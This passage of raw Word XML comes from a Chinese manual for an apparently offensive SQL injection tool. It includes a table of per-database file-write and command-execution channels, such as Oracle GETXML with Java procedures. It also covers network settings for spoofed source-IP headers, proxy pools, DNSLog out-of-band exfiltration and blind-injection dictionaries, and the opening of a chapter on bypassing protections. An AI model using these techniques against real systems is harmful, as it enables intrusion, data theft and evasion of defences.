          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="526E2B6C"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
          </w:tcPr>
          <w:p w14:paraId="4ADB47B8">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>文件写入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
          </w:tcPr>
          <w:p w14:paraId="3F766FFE">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Java SqliWrite / SqliWriteBin 分片 append（写后 SqliFileSize 验证）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1838"/>
          </w:tcPr>
          <w:p w14:paraId="5E75BF38">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>全通道</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
          </w:tcPr>
          <w:p w14:paraId="3C2D0B9A">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>同上；文本写限约 2000 字节，二进制 1500 字节/片</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="849"/>
          </w:tcPr>
          <w:p w14:paraId="040A8082">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="6826112C"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="19776858">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>命令执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="7DC47C36">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GETXML + Java 存储过程（dbms_xmlquery.getxml 在 SELECT 中执行匿名 PL/SQL）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1838"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="5893B1FE">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>全通道（GETXML 部署）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="7D059B8C">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>9i~11g；12c 未验证，18c 弃用 / 21c+ 移除 / XE 无 JVM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="849"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="7EAB66A6">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
          </w:tcPr>
          <w:p w14:paraId="6810D32C">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>HSQLDB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
          </w:tcPr>
          <w:p w14:paraId="78C1BD94">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>全部</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
          </w:tcPr>
          <w:p w14:paraId="0EED3268">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>不支持</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1838"/>
          </w:tcPr>
          <w:p w14:paraId="18C7FC50">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
          </w:tcPr>
          <w:p w14:paraId="15CBB956">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>TEXT TABLE 为 CSV 文本且需多条 DDL 配合，Java 例程需预置 classpath</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="849"/>
          </w:tcPr>
          <w:p w14:paraId="2E85C448">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="60B23F4E">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>DB2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="392C9FB8">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>全部</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="69D65DA8">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>不支持</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1838"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="79F5DE02">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="7ADC8186">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ADMIN_CMD 仅 EXPORT/LOAD 文本级 IO 且需 SYSADM；命令执行需外部例程 DDL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="849"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="2DCF3DC6">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
          </w:tcPr>
          <w:p w14:paraId="11C9071E">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>达梦</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
          </w:tcPr>
          <w:p w14:paraId="494D30F6">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>全部</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
          </w:tcPr>
          <w:p w14:paraId="52CBA08E">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>不支持</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1838"/>
          </w:tcPr>
          <w:p w14:paraId="04B022F8">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
          </w:tcPr>
          <w:p w14:paraId="7C17039A">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>无 DBMS_XMLQUERY；驱动堆叠禁 DDL；Java 外部函数需预置 jar + 开参重启；UTL_FILE 需预建 DIRECTORY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="849"/>
          </w:tcPr>
          <w:p w14:paraId="2C423F26">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6FEF62D6">
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F80015C">
      <w:pPr>
        <w:sectPr>
          <w:pgSz w:w="15840" w:h="12240" w:orient="landscape"/>
          <w:pgMar w:top="1020" w:right="1020" w:bottom="1020" w:left="1020" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30C80A6E">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="4" w:color="1F3B63"/>
        </w:pBdr>
        <w:ind w:left="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="555F6E"/>
        </w:rPr>
        <w:t>二进制上传分片大小自适应：GET 注入约 1200 字节/片（URL 长度受限），POST 最大 6000~7000 字节/片。所有二进制通道均已做 MD5 逐字节实测（ClickHouse 仅下载、SQLite 无扩展时优雅降级提示）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E74AECC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>第 7 章 网络设置</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:left w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:bottom w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:right w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:insideH w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:insideV w:val="single" w:sz="4" w:color="B8C2D1"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="40" w:type="dxa"/>
          <w:left w:w="80" w:type="dxa"/>
          <w:bottom w:w="40" w:type="dxa"/>
          <w:right w:w="80" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1271"/>
        <w:gridCol w:w="8474"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1271"/>
            <w:shd w:val="clear" w:fill="1F3B63"/>
          </w:tcPr>
          <w:p w14:paraId="71BF8C5C">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>选项卡</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8473"/>
            <w:shd w:val="clear" w:fill="1F3B63"/>
          </w:tcPr>
          <w:p w14:paraId="7F9B7D2A">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1271"/>
          </w:tcPr>
          <w:p w14:paraId="4B438996">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>基础配置</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8473"/>
          </w:tcPr>
          <w:p w14:paraId="2BC1C25C">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>请求设置：超时时间、超时重试、跟踪 302、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>随机源 IP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>（伪造 X-Forwarded-For / X-Real-IP / Client-IP 头）、连接池、网页自动解码 / 指定解码；配置导出 / 导入</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1271"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="22C7E660">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>HTTP 认证</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8473"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="55B814BA">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Basic / Digest / NTLM 三种认证配置</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1271"/>
          </w:tcPr>
          <w:p w14:paraId="7A617B60">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>代理设置</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8473"/>
          </w:tcPr>
          <w:p w14:paraId="6E225DFE">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>单代理（HTTP / SOCKS5）与</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>代理池</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>（批量导入、可用性验证、失败自动轮换）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1271"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="21A117C0">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>DNSLog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8473"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="30727950">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">DNSLog 类型选择：公共平台（ceye 等，填 API 模板与 token）/ 自建 DnsServer / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>本机内置接收</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>（监听 53 或高位端口，无需 VPS 即可收 DNS 外带）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1271"/>
          </w:tcPr>
          <w:p w14:paraId="0B4DC518">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>UA 池</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8473"/>
          </w:tcPr>
          <w:p w14:paraId="0C720B78">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>User-Agent 池管理，配合随机 UA 轮换</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1271"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="5F62B93E">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>字典管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8473"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="31E3921E">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>盲注字典（库名 / 表名 / 列名猜解字典）维护，命中即实时上树</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1271"/>
          </w:tcPr>
          <w:p w14:paraId="73C64212">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>重发设置</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8473"/>
          </w:tcPr>
          <w:p w14:paraId="5748ABC0">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>请求失败重发策略（次数、间隔、条件）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="66CB7ECA">
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6494717C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>第 8 章 防护绕过</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:left w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:bottom w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:right w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:insideH w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:insideV w:val="single" w:sz="4" w:color="B8C2D1"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="40" w:type="dxa"/>
          <w:left w:w="80" w:type="dxa"/>
          <w:bottom w:w="40" w:type="dxa"/>
          <w:right w:w="80" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1735"/>
        <w:gridCol w:w="8010"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1735"/>
            <w:shd w:val="clear" w:fill="1F3B63"/>
          </w:tcPr>
          <w:p w14:paraId="7001842E">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>选项卡</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8009"/>
            <w:shd w:val="clear" w:fill="1F3B63"/>
          </w:tcPr>
          <w:p w14:paraId="0F516E2C">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1735"/>
          </w:tcPr>
          <w:p w14:paraId="784CB966">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>频率与指纹</w:t>
            </w:r>
          </w:p>
        </w:tc>
